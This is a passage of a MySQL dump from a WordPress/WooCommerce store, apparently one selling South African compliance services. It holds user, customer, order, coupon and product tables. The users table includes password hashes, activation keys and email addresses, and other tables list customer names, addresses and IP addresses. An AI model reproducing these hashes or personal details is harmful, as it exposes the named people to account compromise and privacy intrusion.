  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_users`
--

LOCK TABLES `wpxb_users` WRITE;
/*!40000 ALTER TABLE `wpxb_users` DISABLE KEYS */;
INSERT INTO `wpxb_users` VALUES (1,'Imraan Wajoodeen CA(SA)','$P$BTdlCuGfrm/06D7mkFLIgRTks9EaCf0','admin-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2-2--2','imraanmaw@gmail.com','','2016-03-10 00:10:08','',0,'Imraan Wajoodeen'),(2,'Shop Manager','$P$Bm.mDGfr0T1695wJqKjU5tCAdv5l8m.','shop-manager','zainubmaw@gmai.com','','2016-03-12 18:43:06','1457808186:$P$Bdb7EMc2S/o3NBM/8Eni6QwBjGXTWq/',0,'Zainub'),(3,'nazeer','$P$Bw2pFMMZFZoDB1t42mdALvS5MhkXfd.','nazeer','nazeer@digitalstrategies.co.za','','2017-03-27 08:55:02','1490604902:$P$BP0CUfFcbLaK6LSEZQ9fbuCB1B62Y2.',0,'Nazeer Abrahams');
/*!40000 ALTER TABLE `wpxb_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_admin_note_actions`
--

DROP TABLE IF EXISTS `wpxb_wc_admin_note_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_admin_note_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `note_id` bigint(20) unsigned NOT NULL,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `label` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `query` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `is_primary` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`action_id`),
  KEY `note_id` (`note_id`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_admin_note_actions`
--

LOCK TABLES `wpxb_wc_admin_note_actions` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_admin_note_actions` DISABLE KEYS */;
INSERT INTO `wpxb_wc_admin_note_actions` VALUES (2,2,'get-started','Get Started','?page=wc-admin#/analytics/settings','actioned',0),(3,3,'learn-more','Learn more','https://woocommerce.wordpress.com/','',0),(4,4,'connect','Connect','?page=wc-addons&section=helper','',0),(5,5,'learn-more','Learn more','https://woocommerce.com/mobile/','',0),(9,9,'view-report','View report','?page=wc-admin&path=/analytics/revenue&period=custom&compare=previous_year&after=2019-08-02&before=2019-08-02','actioned',0),(7,7,'share-feedback','Share feedback','https://github.com/woocommerce/woocommerce-admin/issues/new/choose','',0),(8,8,'browse','Browse','https://woocommerce.com/success-stories/','actioned',0);
/*!40000 ALTER TABLE `wpxb_wc_admin_note_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_admin_notes`
--

DROP TABLE IF EXISTS `wpxb_wc_admin_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_admin_notes` (
  `note_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `locale` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `icon` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `content_data` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `status` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `source` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_reminder` datetime DEFAULT NULL,
  `is_snoozable` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`note_id`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_admin_notes`
--

LOCK TABLES `wpxb_wc_admin_notes` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_admin_notes` DISABLE KEYS */;
INSERT INTO `wpxb_wc_admin_notes` VALUES (2,'wc-admin-historical-data','update','en_US','WooCommerce Admin: Historical Analytics Data','To view your historical analytics data, you must process your existing orders and customers.','info','{}','actioned','woocommerce-admin','2019-06-01 10:00:57',NULL,0),(3,'wc-admin-welcome-note','info','en_US','New feature(s)','Welcome to the new WooCommerce experience! In this new release you\'ll be able to have a glimpse of how your store is doing in the Dashboard, manage important aspects of your business (such as managing orders, stock, reviews) from anywhere in the interface, dive into your store data with a completely new Analytics section and more!','info','{}','unactioned','woocommerce-admin','2019-06-01 12:00:57',NULL,0),(4,'wc-admin-wc-helper-connection','info','en_US','Connect to WooCommerce.com','Connect to get important product notifications and updates.','info','{}','unactioned','woocommerce-admin','2019-06-01 12:00:57',NULL,0),(5,'wc-admin-mobile-app','info','en_US','Install Woo mobile app','Install the WooCommerce mobile app to manage orders, receive sales notifications, and view key metrics — wherever you are.','phone','{}','unactioned','woocommerce-admin','2019-06-03 12:01:55',NULL,0),(9,'wc-admin-new-sales-record','info','en_US','New sales record!','Woohoo, August 2nd was your record day for sales! Net revenue was R 8,873.00 beating the previous record of R 6,750.00 set on June 3rd.','trophy','{\"old_record_date\":\"2019-06-03\",\"old_record_amt\":6750,\"new_record_date\":\"2019-08-02\",\"new_record_amt\":8873}','unactioned','woocommerce-admin','2019-08-03 12:02:23',NULL,0),(7,'wc-admin-store-notice-giving-feedback','info','en_US','Giving feedback','Are you enjoying the new WooCommerce experience? We\'d love to get your feedback.','info','{}','unactioned','woocommerce-admin','2019-06-04 12:01:00',NULL,0),(8,'wc-admin-orders-milestone','info','en_US','Congratulations on processing 10 orders!','You\'ve hit the 10 orders milestone! Look at you go. Browse some WooCommerce success stories for inspiration.','trophy','{}','unactioned','woocommerce-admin','2019-06-18 09:01:13',NULL,0);
/*!40000 ALTER TABLE `wpxb_wc_admin_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_customer_lookup`
--

DROP TABLE IF EXISTS `wpxb_wc_customer_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_customer_lookup` (
  `customer_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `username` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `first_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `last_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `email` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `date_last_active` timestamp NULL DEFAULT NULL,
  `date_registered` timestamp NULL DEFAULT NULL,
  `country` char(2) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `postcode` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `city` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `state` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`customer_id`),
  UNIQUE KEY `user_id` (`user_id`),
  KEY `email` (`email`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_customer_lookup`
--

LOCK TABLES `wpxb_wc_customer_lookup` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_customer_lookup` DISABLE KEYS */;
INSERT INTO `wpxb_wc_customer_lookup` VALUES (1,3,'nazeer','Nazeer','Abrahams','nazeer@digitalstrategies.co.za','0000-00-00 00:00:00','2017-03-27 12:55:02','ZA','1825','Ennerdale','GP'),(2,1,'Imraan Wajoodeen CA(SA)','Imraan','Wajoodeen','imraanmaw@gmail.com','0000-00-00 00:00:00','2016-03-10 05:10:08','ZA','1827','Johannesburg','GP'),(3,NULL,'','Foluke','Brown Olorunlose','','2019-08-01 14:11:49',NULL,'','','',''),(4,NULL,'','Mpho','Julie','','2019-08-01 19:40:15',NULL,'','','',''),(5,NULL,'','Bat','Man','nazeer3791@gmail.com','2019-08-02 13:10:34',NULL,'ZA','1827','johannesburg','GP'),(6,4,'PayfastU','Payfast','Temp','info@digitalstrategies.biz','0000-00-00 00:00:00','2019-08-06 12:08:10','ZA','4525','Cape town','WC');
/*!40000 ALTER TABLE `wpxb_wc_customer_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_download_log`
--

DROP TABLE IF EXISTS `wpxb_wc_download_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_download_log` (
  `download_log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `permission_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `user_ip_address` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`download_log_id`),
  KEY `permission_id` (`permission_id`),
  KEY `timestamp` (`timestamp`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_download_log`
--

LOCK TABLES `wpxb_wc_download_log` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_download_log` DISABLE KEYS */;
INSERT INTO `wpxb_wc_download_log` VALUES (1,'2018-05-06 17:23:17',4,1,'165.255.122.2'),(2,'2018-05-06 17:24:16',4,1,'165.255.122.2'),(3,'2019-08-08 13:29:35',5,1,'165.255.71.51');
/*!40000 ALTER TABLE `wpxb_wc_download_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_order_coupon_lookup`
--

DROP TABLE IF EXISTS `wpxb_wc_order_coupon_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_order_coupon_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `coupon_id` bigint(20) unsigned NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `discount_amount` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_id`,`coupon_id`),
  KEY `coupon_id` (`coupon_id`),
  KEY `date_created` (`date_created`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_order_coupon_lookup`
--

LOCK TABLES `wpxb_wc_order_coupon_lookup` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_order_coupon_lookup` DISABLE KEYS */;
INSERT INTO `wpxb_wc_order_coupon_lookup` VALUES (29963,29812,'2019-06-07 09:31:23',551),(29963,29813,'2019-06-07 09:31:23',198),(29981,29813,'2019-06-10 19:37:30',198),(30007,29813,'2019-06-11 11:29:59',198),(30018,29813,'2019-06-11 14:47:16',198),(30179,29812,'2019-06-13 14:15:41',551),(30179,29813,'2019-06-13 14:15:41',198),(30197,29812,'2019-06-13 16:34:42',551),(32034,29812,'2019-08-01 12:11:49',551),(32071,29812,'2019-08-01 17:40:15',551),(32108,29812,'2019-08-02 10:59:21',551),(32115,29812,'2019-08-02 11:10:34',551),(32248,29812,'2019-08-05 08:43:02',551),(32262,29812,'2019-08-05 10:08:10',551),(32268,29812,'2019-08-05 10:49:26',551),(32274,29812,'2019-08-05 11:58:18',551),(32432,32427,'2019-08-08 15:25:00',189),(33225,29812,'2019-08-24 14:38:34',851),(33230,29812,'2019-08-24 15:11:03',851),(33236,29812,'2019-08-24 15:31:07',851);
/*!40000 ALTER TABLE `wpxb_wc_order_coupon_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_order_product_lookup`
--

DROP TABLE IF EXISTS `wpxb_wc_order_product_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_order_product_lookup` (
  `order_item_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `variation_id` bigint(20) unsigned NOT NULL,
  `customer_id` bigint(20) unsigned DEFAULT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `product_qty` int(11) NOT NULL,
  `product_net_revenue` double NOT NULL DEFAULT 0,
  `product_gross_revenue` double NOT NULL DEFAULT 0,
  `coupon_amount` double NOT NULL DEFAULT 0,
  `tax_amount` double NOT NULL DEFAULT 0,
  `shipping_amount` double NOT NULL DEFAULT 0,
  `shipping_tax_amount` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`),
  KEY `product_id` (`product_id`),
  KEY `customer_id` (`customer_id`),
  KEY `date_created` (`date_created`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_order_product_lookup`
--

LOCK TABLES `wpxb_wc_order_product_lookup` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_order_product_lookup` DISABLE KEYS */;
INSERT INTO `wpxb_wc_order_product_lookup` VALUES (148,29515,59,0,1,'2019-05-16 15:06:22',1,1500,1500,0,0,0,0),(150,29527,28,0,1,'2019-05-16 15:21:44',1,750,750,0,0,0,0),(191,29958,28,0,1,'2019-06-07 09:11:23',1,750,750,0,0,0,0),(192,29958,29583,0,1,'2019-06-07 09:11:23',1,990,990,0,0,0,0),(193,29963,28,0,1,'2019-06-07 09:31:23',1,750,750,551,0,0,0),(194,29963,29583,0,1,'2019-06-07 09:31:23',1,990,990,198,0,0,0),(197,29981,29681,0,1,'2019-06-10 19:37:30',1,135,135,0,0,0,0),(198,29981,29583,0,1,'2019-06-10 19:37:30',1,990,990,198,0,0,0),(206,29981,29681,0,1,'2019-06-10 19:37:30',1,135,135,0,0,0,0),(207,29981,29583,0,1,'2019-06-10 19:37:30',1,990,990,198,0,0,0),(209,30007,29583,0,1,'2019-06-11 11:29:59',1,990,990,198,0,0,0),(215,30018,29583,0,1,'2019-06-11 14:47:16',1,990,990,198,0,0,0),(216,30018,28,0,1,'2019-06-11 14:47:16',1,750,750,0,0,0,0),(218,30025,28,0,1,'2019-06-11 15:12:30',1,750,750,0,0,0,0),(219,30065,29583,0,2,'2019-06-11 21:01:29',1,990,990,0,0,0,0),(220,30179,29583,0,2,'2019-06-13 14:15:41',1,990,990,198,0,0,0),(221,30179,28,0,2,'2019-06-13 14:15:41',1,750,750,551,0,0,0),(224,30197,28,0,1,'2019-06-13 16:34:42',1,750,750,551,0,0,0),(226,31201,70,0,2,'2019-06-18 10:42:33',1,450,450,0,0,0,0),(227,31229,70,0,2,'2019-06-18 11:34:43',1,450,450,0,0,0,0),(228,31234,70,0,2,'2019-06-18 11:36:49',1,450,450,0,0,0,0),(229,32034,28,0,3,'2019-08-01 12:11:49',1,750,750,551,0,0,0),(213,30007,29583,0,1,'2019-06-11 11:29:59',1,990,990,198,0,0,0),(231,32071,28,0,4,'2019-08-01 17:40:15',1,750,750,551,0,0,0),(233,32103,28,0,1,'2019-08-02 10:42:48',1,750,750,0,0,0,0),(234,32108,28,0,1,'2019-08-02 10:59:21',1,750,750,551,0,0,0),(236,32115,28,0,5,'2019-08-02 11:10:34',1,750,750,551,0,0,0),(238,32119,28,0,5,'2019-08-02 11:14:47',1,750,750,0,0,0,0),(239,32128,62,0,1,'2019-08-02 13:46:02',1,4650,4650,0,0,0,0),(240,32137,64,0,1,'2019-08-02 14:50:23',1,2250,2250,0,0,0,0),(241,32142,31327,0,1,'2019-08-02 14:58:06',1,75,75,0,0,0,0),(242,32248,28,0,1,'2019-08-05 08:43:02',1,750,750,551,0,0,0),(244,32262,28,0,1,'2019-08-05 10:08:10',1,750,750,551,0,0,0),(245,32262,31327,0,1,'2019-08-05 10:08:10',1,75,75,0,0,0,0),(247,32268,28,0,1,'2019-08-05 10:49:26',1,750,750,551,0,0,0),(248,32268,31327,0,1,'2019-08-05 10:49:26',1,75,75,0,0,0,0),(250,32274,28,0,1,'2019-08-05 11:58:18',1,750,750,551,0,0,0),(251,32274,31327,0,1,'2019-08-05 11:58:18',1,75,75,0,0,0,0),(254,32348,64,0,6,'2019-08-07 11:18:44',1,2250,2250,0,0,0,0),(255,32432,80,0,2,'2019-08-08 15:25:00',1,199,199,189,0,0,0),(257,33225,28,0,2,'2019-08-24 14:38:34',1,1250,1250,851,0,0,0),(258,33225,29583,0,2,'2019-08-24 14:38:34',1,792,792,0,0,0,0),(260,33230,28,0,2,'2019-08-24 15:11:03',1,1250,1250,851,0,0,0),(262,33236,28,0,2,'2019-08-24 15:31:07',1,1250,1250,851,0,0,0);
/*!40000 ALTER TABLE `wpxb_wc_order_product_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_order_stats`
--

DROP TABLE IF EXISTS `wpxb_wc_order_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_order_stats` (
  `order_id` bigint(20) unsigned NOT NULL,
  `parent_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `num_items_sold` int(11) NOT NULL DEFAULT 0,
  `gross_total` double NOT NULL DEFAULT 0,
  `tax_total` double NOT NULL DEFAULT 0,
  `shipping_total` double NOT NULL DEFAULT 0,
  `net_total` double NOT NULL DEFAULT 0,
  `returning_customer` tinyint(1) DEFAULT NULL,
  `status` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `customer_id` bigint(20) unsigned NOT NULL,
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`order_id`),
  KEY `date_created` (`date_created`),
  KEY `customer_id` (`customer_id`),
  KEY `status` (`status`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_order_stats`
--

LOCK TABLES `wpxb_wc_order_stats` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_order_stats` DISABLE KEYS */;
INSERT INTO `wpxb_wc_order_stats` VALUES (29515,0,'2019-05-16 15:06:22',1,1500,0,0,1500,1,'wc-trash',1,'0000-00-00 00:00:00'),(29527,0,'2019-05-16 15:21:44',1,750,0,0,750,1,'wc-trash',1,'0000-00-00 00:00:00'),(29958,0,'2019-06-07 09:11:23',2,1740,0,0,1740,0,'wc-trash',1,'2019-06-07 07:11:23'),(29963,0,'2019-06-07 09:31:23',2,991,0,0,991,1,'wc-trash',1,'2019-06-07 07:31:23'),(29981,0,'2019-06-10 19:37:30',2,927,0,0,927,1,'wc-trash',1,'2019-06-10 17:37:30'),(30007,0,'2019-06-11 11:29:59',1,792,0,0,792,1,'wc-trash',1,'2019-06-11 09:29:59'),(30018,0,'2019-06-11 14:47:16',2,1542,0,0,1542,1,'wc-trash',1,'2019-06-11 12:47:16'),(30025,0,'2019-06-11 15:12:30',1,750,0,0,750,1,'wc-trash',1,'2019-06-11 13:12:30'),(30065,0,'2019-06-11 21:01:29',1,990,0,0,990,0,'wc-trash',2,'2019-06-11 19:01:29'),(30179,0,'2019-06-13 14:15:41',2,991,0,0,991,1,'wc-trash',2,'2019-06-13 12:15:41'),(30197,0,'2019-06-13 16:34:42',1,199,0,0,199,1,'wc-trash',1,'2019-06-13 14:34:42'),(31201,0,'2019-06-18 10:42:33',1,450,0,0,450,1,'wc-trash',2,'2019-06-18 08:42:33'),(31229,0,'2019-06-18 11:34:43',1,450,0,0,450,1,'wc-trash',2,'2019-06-18 09:34:43'),(31234,0,'2019-06-18 11:36:49',1,450,0,0,450,1,'wc-trash',2,'2019-06-18 09:36:49'),(32034,0,'2019-08-01 12:11:49',1,199,0,0,199,0,'wc-completed',3,'2019-08-01 10:11:49'),(32071,0,'2019-08-01 17:40:15',1,199,0,0,199,0,'wc-completed',4,'2019-08-01 15:40:15'),(32103,0,'2019-08-02 10:42:48',1,750,0,0,750,0,'wc-completed',1,'2019-08-02 08:42:48'),(32108,0,'2019-08-02 10:59:21',1,199,0,0,199,1,'wc-completed',1,'2019-08-02 08:59:21'),(32115,0,'2019-08-02 11:10:34',1,199,0,0,199,0,'wc-completed',5,'2019-08-02 09:10:34'),(32119,0,'2019-08-02 11:14:47',1,750,0,0,750,1,'wc-completed',5,'2019-08-02 09:14:47'),(32128,0,'2019-08-02 13:46:02',1,4650,0,0,4650,1,'wc-completed',1,'2019-08-02 11:46:02'),(32137,0,'2019-08-02 14:50:23',1,2250,0,0,2250,1,'wc-completed',1,'2019-08-02 12:50:23'),(32142,0,'2019-08-02 14:58:06',1,75,0,0,75,1,'wc-completed',1,'2019-08-02 12:58:06'),(32248,0,'2019-08-05 08:43:02',1,199,0,0,199,1,'wc-completed',1,'2019-08-05 06:43:02'),(32262,0,'2019-08-05 10:08:10',2,274,0,0,274,1,'wc-pending',1,'2019-08-05 08:08:10'),(32268,0,'2019-08-05 10:49:26',2,274,0,0,274,1,'wc-pending',1,'2019-08-05 08:49:26'),(32274,0,'2019-08-05 11:58:18',2,274,0,0,274,1,'wc-pending',1,'2019-08-05 09:58:18'),(32348,0,'2019-08-07 11:18:44',1,2250,0,0,2250,0,'wc-pending',6,'2019-08-07 09:18:44'),(32432,0,'2019-08-08 15:25:00',1,10,0,0,10,0,'wc-completed',2,'2019-08-08 13:25:00'),(33225,0,'2019-08-24 14:38:34',2,1191,0,0,1191,1,'wc-cancelled',2,'2019-08-24 12:38:34'),(33230,0,'2019-08-24 15:11:03',1,399,0,0,399,1,'wc-cancelled',2,'2019-08-24 13:11:03'),(33236,0,'2019-08-24 15:31:07',1,399,0,0,399,1,'wc-cancelled',2,'2019-08-24 13:31:07');
/*!40000 ALTER TABLE `wpxb_wc_order_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_order_tax_lookup`
--

DROP TABLE IF EXISTS `wpxb_wc_order_tax_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_order_tax_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `shipping_tax` double NOT NULL DEFAULT 0,
  `order_tax` double NOT NULL DEFAULT 0,
  `total_tax` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_id`,`tax_rate_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `date_created` (`date_created`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_order_tax_lookup`
--

LOCK TABLES `wpxb_wc_order_tax_lookup` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_order_tax_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wc_order_tax_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_product_meta_lookup`
--

DROP TABLE IF EXISTS `wpxb_wc_product_meta_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_product_meta_lookup` (
  `product_id` bigint(20) NOT NULL,
  `sku` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `virtual` tinyint(1) DEFAULT 0,
  `downloadable` tinyint(1) DEFAULT 0,
  `min_price` decimal(10,2) DEFAULT NULL,
  `max_price` decimal(10,2) DEFAULT NULL,
  `onsale` tinyint(1) DEFAULT 0,
  `stock_quantity` double DEFAULT NULL,
  `stock_status` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT 'instock',
  `rating_count` bigint(20) DEFAULT 0,
  `average_rating` decimal(3,2) DEFAULT 0.00,
  `total_sales` bigint(20) DEFAULT 0,
  PRIMARY KEY (`product_id`),
  KEY `virtual` (`virtual`),
  KEY `downloadable` (`downloadable`),
  KEY `stock_status` (`stock_status`),
  KEY `stock_quantity` (`stock_quantity`),
  KEY `onsale` (`onsale`),
  KEY `min_max_price` (`min_price`,`max_price`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_product_meta_lookup`
--

LOCK TABLES `wpxb_wc_product_meta_lookup` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_product_meta_lookup` DISABLE KEYS */;
INSERT INTO `wpxb_wc_product_meta_lookup` VALUES (28,'CIPC001',1,0,1250.00,1250.00,0,NULL,'instock',0,0.00,53),(59,'CIPC002',1,0,1500.00,1500.00,0,NULL,'instock',0,0.00,16),(62,'CIPC003',1,0,4650.00,4650.00,0,NULL,'instock',0,0.00,9),(64,'CIPC004',1,0,2250.00,2250.00,0,NULL,'instock',0,0.00,8),(65,'MAI001',1,1,450.00,450.00,0,NULL,'instock',0,0.00,6),(67,'MAI002',1,1,450.00,450.00,0,NULL,'instock',0,0.00,5),(68,'MAI003',1,1,450.00,450.00,0,NULL,'instock',0,0.00,4),(69,'MAI004',1,1,450.00,450.00,0,NULL,'instock',0,0.00,3),(70,'MAI005',1,0,450.00,450.00,0,NULL,'instock',0,0.00,9),(71,'MAI006',1,1,450.00,450.00,0,NULL,'instock',0,0.00,0),(72,'MAI007',1,1,3500.00,3500.00,0,NULL,'instock',0,0.00,3),(73,'MAI008',1,0,500.00,500.00,0,NULL,'instock',0,0.00,1),(74,'SARS001',1,1,150.00,150.00,0,NULL,'instock',0,0.00,3),(75,'SARS003',1,1,1500.00,1500.00,0,NULL,'instock',0,0.00,7),(76,'SARS006',1,1,450.00,450.00,0,NULL,'instock',0,0.00,5),(77,'SARS002',1,1,3500.00,3500.00,0,NULL,'instock',0,0.00,4),(78,'SARS004',1,1,2250.00,2250.00,0,NULL,'instock',0,0.00,6),(79,'BEE001',1,1,199.00,199.00,0,NULL,'instock',0,0.00,8),(80,'FREE eReport',1,1,199.00,199.00,0,NULL,'instock',0,0.00,6),(237,'SARS005',1,1,5000.00,5000.00,0,NULL,'instock',0,0.00,5),(28088,'COMB001',0,0,999.00,999.00,1,NULL,'instock',0,0.00,3),(28090,'COMB002',0,0,1699.00,1699.00,1,NULL,'instock',0,0.00,3),(28091,'COMB003',0,0,4999.00,4999.00,1,NULL,'instock',0,0.00,3),(28092,'COMB004',0,0,5999.00,5999.00,1,NULL,'instock',0,0.00,3),(29583,'BT002',1,0,990.00,990.00,0,NULL,'instock',0,0.00,8),(29681,'',0,0,99.00,99.00,0,NULL,'instock',0,0.00,1),(29765,'GRP001',0,0,750.00,990.00,0,NULL,'instock',0,0.00,0),(30118,'NPO-001',1,0,1999.00,1999.00,0,NULL,'instock',0,0.00,0),(31327,'MAI009',0,0,250.00,250.00,0,NULL,'instock',0,0.00,1),(33334,'MAI009',1,0,450.00,450.00,0,NULL,'instock',0,0.00,0);
/*!40000 ALTER TABLE `wpxb_wc_product_meta_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_tax_rate_classes`
--

DROP TABLE IF EXISTS `wpxb_wc_tax_rate_classes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_tax_rate_classes` (
  `tax_rate_class_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_class_id`),
  UNIQUE KEY `slug` (`slug`(191))
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_tax_rate_classes`
--

